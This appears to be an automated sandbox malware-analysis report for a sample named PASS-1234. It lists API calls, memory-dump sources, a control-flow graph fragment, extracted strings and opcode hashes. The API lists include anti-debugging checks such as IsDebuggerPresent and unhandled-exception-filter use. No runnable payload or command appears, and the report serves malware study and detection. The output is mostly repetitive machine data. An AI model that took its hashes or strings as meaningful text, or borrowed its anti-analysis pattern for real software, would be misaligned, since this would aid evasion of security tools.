                                                                                          • Instruction ID: 612f14e803a20429541f32b4d771537b8556078c6f553d5ddf0dc0bea553d06f
                                                                                          • Opcode Fuzzy Hash: 067c20137160065a0596879428f2616c0703d993f3be06def05cd9fccce98165
                                                                                          • Instruction Fuzzy Hash: 1411B671A082116BDB309E2D9C42BBA3BB9B716739F191627EA65CF1D0F3B4C8818740

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1614 6d393126-6d393131 1615 6d39313f-6d393145 1614->1615 1616 6d393133-6d39313d 1614->1616 1618 6d39315e-6d39316f RtlAllocateHeap 1615->1618 1619 6d393147-6d393148 1615->1619 1616->1615 1617 6d393173-6d39317e call 6d393113 1616->1617 1623 6d393180-6d393182 1617->1623 1620 6d39314a-6d393151 call 6d395b85 1618->1620 1621 6d393171 1618->1621 1619->1618 1620->1617 1627 6d393153-6d39315c call 6d394d45 1620->1627 1621->1623 1627->1617 1627->1618
                                                                                          APIs
                                                                                          • RtlAllocateHeap.NTDLL(00000008,?,00000000,?,6D392D29,00000001,00000364,00000013,000000FF,?,00000001,6D393118,6D3931A9,?,?,6D3923BC), ref: 6D393167
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocateHeap
                                                                                          • String ID:
                                                                                          • API String ID: 1279760036-0
                                                                                          • Opcode ID: 9f994a65643679dfd325bc30d1e3867020c09c5cb7150d0e5a389a35c13ca4de
                                                                                          • Instruction ID: b709e4712cfe2873a539f844c558180e4525db78c4d6cc334c998b4b3d6688b0
                                                                                          • Opcode Fuzzy Hash: 9f994a65643679dfd325bc30d1e3867020c09c5cb7150d0e5a389a35c13ca4de
                                                                                          • Instruction Fuzzy Hash: 73F024B160812576EB123A2A8C02BAA376CAF436A0B058122E91D9F2E0FB21D500C2F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: G2Wv$G2Wv$`r $`r
                                                                                          • API String ID: 0-4165461558
                                                                                          • Opcode ID: 2ccde4c7a05cc948989a403257a67cd64e7e39d866e8108c26880ddabc9b5f87
                                                                                          • Instruction ID: ae9f5e380d2da27fe09191cdfc6bfa4b16f84f94850d84f727bf1fa6d696f0ab
                                                                                          • Opcode Fuzzy Hash: 2ccde4c7a05cc948989a403257a67cd64e7e39d866e8108c26880ddabc9b5f87
                                                                                          • Instruction Fuzzy Hash: 23922537E542019FCF09CE7CD5953DD7BF6BB86310F10D61AD921EB396C62A89098B28
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(00000017,?), ref: 6D390526
                                                                                          • IsDebuggerPresent.KERNEL32 ref: 6D3905F2
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 6D390612
                                                                                          • UnhandledExceptionFilter.KERNEL32(?), ref: 6D39061C
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 254469556-0
                                                                                          • Opcode ID: 4b254b64e58d89fc7bc17bb8424aeae760055b183ffd3230732cb58a3f021f7b
                                                                                          • Instruction ID: a2682ce780742acdbac62f3c144ec5aad03f85d3d88ac28ff5f1a7e0d934d674
                                                                                          • Opcode Fuzzy Hash: 4b254b64e58d89fc7bc17bb8424aeae760055b183ffd3230732cb58a3f021f7b
                                                                                          • Instruction Fuzzy Hash: E63134B5D0521D9BDF10DFA5C98ABCDBBB8BF08304F1041AAE408AB240EB719A85CF44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ^WB`$v@\X$v@\X
                                                                                          • API String ID: 0-1414892351
                                                                                          • Opcode ID: c1b0e8c45fd50653bbcf8df655694c12e86a66b8c22c6a145c4ef7998a777057
                                                                                          • Instruction ID: 9de259e68af326ca9f16902189f3a0e013dca7f2ad78bfdf0a02d0e34bde0355
                                                                                          • Opcode Fuzzy Hash: c1b0e8c45fd50653bbcf8df655694c12e86a66b8c22c6a145c4ef7998a777057
                                                                                          • Instruction Fuzzy Hash: 0FF23536B602158FDF15CE3CC9957DEBBFABB46310F10A15AD919DB396C23A8949CB00
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: _I$_I$aAxg$aAxg
                                                                                          • API String ID: 0-1894833198
                                                                                          • Opcode ID: d1ff647657749abaef8ca4f66d10e21cc79cc2bc6078db7d85e36637fb49fa3a
                                                                                          • Instruction ID: 3278041b4eec0c0129b13d5300e78d9363603512a914c1025ad4df62761a9332
                                                                                          • Opcode Fuzzy Hash: d1ff647657749abaef8ca4f66d10e21cc79cc2bc6078db7d85e36637fb49fa3a
                                                                                          • Instruction Fuzzy Hash: 6C6291B6F201059FCF08CEACD8817DEBBF7BB4A350F149115E825E7395C63A99098B64
                                                                                          APIs
                                                                                          • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 6D392FA2
                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 6D392FAC
                                                                                          • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 6D392FB9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                          • String ID:
                                                                                          • API String ID: 3906539128-0
                                                                                          • Opcode ID: 38d5a9aea98577e9071b9863be57d26f296a21dbf84e153901882d65a0bb757a
                                                                                          • Instruction ID: 44887f8d750bf5856f53526fd2e4540b55775a50fd5cb089f9ec37b60efaef30
                                                                                          • Opcode Fuzzy Hash: 38d5a9aea98577e9071b9863be57d26f296a21dbf84e153901882d65a0bb757a
                                                                                          • Instruction Fuzzy Hash: 0531C575D0121DABCB21DF65D989B9DBBB8FF48310F5042EAE41CAB250E7709B818F44
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: \$k_XY$xyz{
                                                                                          • API String ID: 0-3857921785
                                                                                          • Opcode ID: 59eda82679a7d5261ae6a4c959f0b0482143335ce588c1437f4cf7bf13fa235c
                                                                                          • Instruction ID: 25bf69096c76819ab014ba66808ed75ba8fb210ea1ff819248df442a7fb69c40
                                                                                          • Opcode Fuzzy Hash: 59eda82679a7d5261ae6a4c959f0b0482143335ce588c1437f4cf7bf13fa235c
                                                                                          • Instruction Fuzzy Hash: 62422272A083408FD714CF29C8817ABBBE6EFC5710F198A6CE5959B391D734D909CB92
                                                                                          APIs
                                                                                          • GetCurrentProcess.KERNEL32(?,?,6D391CA4,?,00000001,?,?), ref: 6D391CC7
                                                                                          • TerminateProcess.KERNEL32(00000000,?,6D391CA4,?,00000001,?,?), ref: 6D391CCE
                                                                                          • ExitProcess.KERNEL32 ref: 6D391CE0
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: Process$CurrentExitTerminate
                                                                                          • String ID:
                                                                                          • API String ID: 1703294689-0
                                                                                          • Opcode ID: f1ab702f04938385e75a44e354ca1eca65194662a807088ef71b463c1cb907eb
                                                                                          • Instruction ID: e5ea62f8ebcbe1bb68bb5e415bff0641e78e398a76b142831e48d5928392e4af
                                                                                          • Opcode Fuzzy Hash: f1ab702f04938385e75a44e354ca1eca65194662a807088ef71b463c1cb907eb
                                                                                          • Instruction Fuzzy Hash: E4E04632804508BBCF126B55CA09E983B7DEB01245B014514FA089E620EB3AD982CB80
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 0$8
                                                                                          • API String ID: 0-46163386
                                                                                          • Opcode ID: fa2f3f3a1103f74cb571acb7a8831fbff151dfe2d9e665ee31138c2d67e08963
                                                                                          • Instruction ID: 21003bede609a86e6d6fd7abd8da805f153545b11cb6eb136da3c12559965052
                                                                                          • Opcode Fuzzy Hash: fa2f3f3a1103f74cb571acb7a8831fbff151dfe2d9e665ee31138c2d67e08963
                                                                                          • Instruction Fuzzy Hash: A47236716083409FD724CF18C890BABBBE1EF98314F14896DF9998B391D7B5D948CB92
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: _o!
                                                                                          • API String ID: 0-296821256
                                                                                          • Opcode ID: f528a552ca697ad65b502f91adbfc00a5691185cce83c3a51858ffa332e84e60
                                                                                          • Instruction ID: e983307c913e830e5d48991ae13f06b65b77e6eba5eacc9966afcc50cbe1efa8
                                                                                          • Opcode Fuzzy Hash: f528a552ca697ad65b502f91adbfc00a5691185cce83c3a51858ffa332e84e60
                                                                                          • Instruction Fuzzy Hash: 22222276A542418FCF098E7CC8917DEBBE6BB87351F14E216C531E7396C32A8909CB64
                                                                                          APIs
                                                                                          • RaiseException.KERNEL32(C000000D,00000000,00000001,?,?,00000008,?,?,6D39952C,?,?,00000008,?,?,6D3991C4,00000000), ref: 6D39975E
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: ExceptionRaise
                                                                                          • String ID:
                                                                                          • API String ID: 3997070919-0
                                                                                          • Opcode ID: 2ab92dcf02ee7dcc2f56dcd3f471f073f2a655464aaedbba99027521da010a47
                                                                                          • Instruction ID: bf8736f1c28523a42a9cc0a3678a5e63ca0dcd0da19048b11a8bf843782d673a
                                                                                          • Opcode Fuzzy Hash: 2ab92dcf02ee7dcc2f56dcd3f471f073f2a655464aaedbba99027521da010a47
                                                                                          • Instruction Fuzzy Hash: B5B16B32620609CFD705CF28C486BA57BE0FF45364F258658F9A9CF2A1D736E982CB50
                                                                                          APIs
                                                                                          • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 6D3906FE
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: FeaturePresentProcessor
                                                                                          • String ID:
                                                                                          • API String ID: 2325560087-0
                                                                                          • Opcode ID: 5c401289f95ac3bd192ac44a33d31d76131f94d1755eadd9b6ce7b79dee4a13a
                                                                                          • Instruction ID: 4064d068b7383cc8db56d88bce25242121c3f0e7a961acc539cc55172662c969
                                                                                          • Opcode Fuzzy Hash: 5c401289f95ac3bd192ac44a33d31d76131f94d1755eadd9b6ce7b79dee4a13a
                                                                                          • Instruction Fuzzy Hash: E0515EB2A0430A9BEB16CF56C8827AAB7F4FB48314F10852AD525EF381E3759940CF90
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: a2766f27c6eb219a0330456948b080a2272816139a73383700dabfa1a7b3ddd4
                                                                                          • Instruction ID: 13c1279fa53373a0ec4d4bb6fefbc2f2366ff516b08306efeebbe0910966b4e7
                                                                                          • Opcode Fuzzy Hash: a2766f27c6eb219a0330456948b080a2272816139a73383700dabfa1a7b3ddd4
                                                                                          • Instruction Fuzzy Hash: 45418EB580821DAEDB10DF69CC89AAABBB9EF45304F1442EDE45D97210EA359E848F50
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ~
                                                                                          • API String ID: 0-1707062198
                                                                                          • Opcode ID: 5849eed77cbd9f3effddeeaa52731693b6fddd9bd2147241cc186fed283fd09b
                                                                                          • Instruction ID: 8d92a86064b0a2644dfdd36f9b02cb98c8c0cf19dce0b7ebdb226486215ffa82
                                                                                          • Opcode Fuzzy Hash: 5849eed77cbd9f3effddeeaa52731693b6fddd9bd2147241cc186fed283fd09b
                                                                                          • Instruction Fuzzy Hash: 398119729042618FC7128E28889176EBBD1EB85324F19C6BDECBA9B392D634DC05D7D1
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: 2)g
                                                                                          • API String ID: 0-1562922993
                                                                                          • Opcode ID: a34ea2351883713a67a62e8ef963df8060f031dc369b3303355fcd0f74422e4b
                                                                                          • Instruction ID: 4a3d210210dbf5ef0e90f3c52a62989fb5583f16f303234838316519c51b1e83
                                                                                          • Opcode Fuzzy Hash: a34ea2351883713a67a62e8ef963df8060f031dc369b3303355fcd0f74422e4b
                                                                                          • Instruction Fuzzy Hash: 83218C31C057538FCB15DE39C1D5587FBF0BF26300B1842A9CAA24B6A9D72054228BD3
                                                                                          APIs
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2210246444.000000006D381000.00000020.00000001.01000000.00000007.sdmp, Offset: 6D380000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2210225307.000000006D380000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210282004.000000006D39A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210305355.000000006D3A0000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2210368316.000000006D3ED000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_6d380000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID: HeapProcess
                                                                                          • String ID:
                                                                                          • API String ID: 54951025-0
                                                                                          • Opcode ID: e71e963b0ad35633c3e64c627024b461ae6a6d44e6c14e02fd89b10e3b9560b2
                                                                                          • Instruction ID: 3eae0d9478617c71ca98ebd36ed137a66b91725a7a36ad1d17621756a332bf22
                                                                                          • Opcode Fuzzy Hash: e71e963b0ad35633c3e64c627024b461ae6a6d44e6c14e02fd89b10e3b9560b2
                                                                                          • Instruction Fuzzy Hash: 0BA01130A02200AB8B008E328288B0C3ABCAA022C030A82BAA000CA080EB208080AA80
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 9492b3fd694079afe65822f7100328fa0b1baa40b4dbe0688e5ef8c74d3ff70e
                                                                                          • Instruction ID: 0005af338d591c7a55ca5873ed598db53b135781057945da5fa0bd0b1a3cabcc
                                                                                          • Opcode Fuzzy Hash: 9492b3fd694079afe65822f7100328fa0b1baa40b4dbe0688e5ef8c74d3ff70e
                                                                                          • Instruction Fuzzy Hash: EE52B1315083558FCB14CF19C0906FABBE1FF99314F198AADE89A57342D7B4E949CB81
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: ccfc488c413313106f90fb5275672a2fed0ac348e4e61b95f74944ea1d7b1981
                                                                                          • Instruction ID: caeb8e0bb35ef7573b77df50bc8171b821e2c891a723cb5d4f07ba38f459cc81
                                                                                          • Opcode Fuzzy Hash: ccfc488c413313106f90fb5275672a2fed0ac348e4e61b95f74944ea1d7b1981
                                                                                          • Instruction Fuzzy Hash: 6452B07094CB848FE735CB24C4843FBBBE1EF91314F1488ADD5E606682CBB9A985CB55
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: f3e58bb79a52713d02a4e21882f4a0b4c66b9283835b0637b801eaf4d4971774
                                                                                          • Instruction ID: d9481af19acfe02ac99bf66c88d8797532a2cf980126c2ba2c9e5b4f218bb934
                                                                                          • Opcode Fuzzy Hash: f3e58bb79a52713d02a4e21882f4a0b4c66b9283835b0637b801eaf4d4971774
                                                                                          • Instruction Fuzzy Hash: 9D22C132A087118BC735DF18D8806BBB3EAFFC4315F19896DD9C697285DB74A811CB86
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 03d9d1927447e0a7cb520082b674f9820269535b78728de11c2a632abc32c708
                                                                                          • Instruction ID: 1b4cb80c6ff3f578f3d488a9622468edcb662277f17d531abcc8ec9a93903004
                                                                                          • Opcode Fuzzy Hash: 03d9d1927447e0a7cb520082b674f9820269535b78728de11c2a632abc32c708
                                                                                          • Instruction Fuzzy Hash: E5321170915B108FC338CF29C5905AABBF1FB85710B604A6ED6A787E92D7B6F844CB14
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
                                                                                          • API String ID:
                                                                                          • Opcode ID: 84811eddf4519fc221c0ad8aa51f14681eebea8cd052d8972bb2095874e34881
                                                                                          • Instruction ID: 1aedbb835cc292ce057d32bb83e8a2057ea3e987c054062e257def00c16f508b
                                                                                          • Opcode Fuzzy Hash: 84811eddf4519fc221c0ad8aa51f14681eebea8cd052d8972bb2095874e34881
                                                                                          • Instruction Fuzzy Hash: 05525EB0509B819ED326CF3C8815797BFE5AB5A324F044A9EE0FA873D2C7756005CB66
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000000.00000002.2208212980.0000000000B92000.00000040.00000001.01000000.00000003.sdmp, Offset: 00B90000, based on PE: true
                                                                                          • Associated: 00000000.00000002.2208189694.0000000000B90000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          • Associated: 00000000.00000002.2208301118.0000000000C22000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_0_2_b90000_PASS-1234.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID:
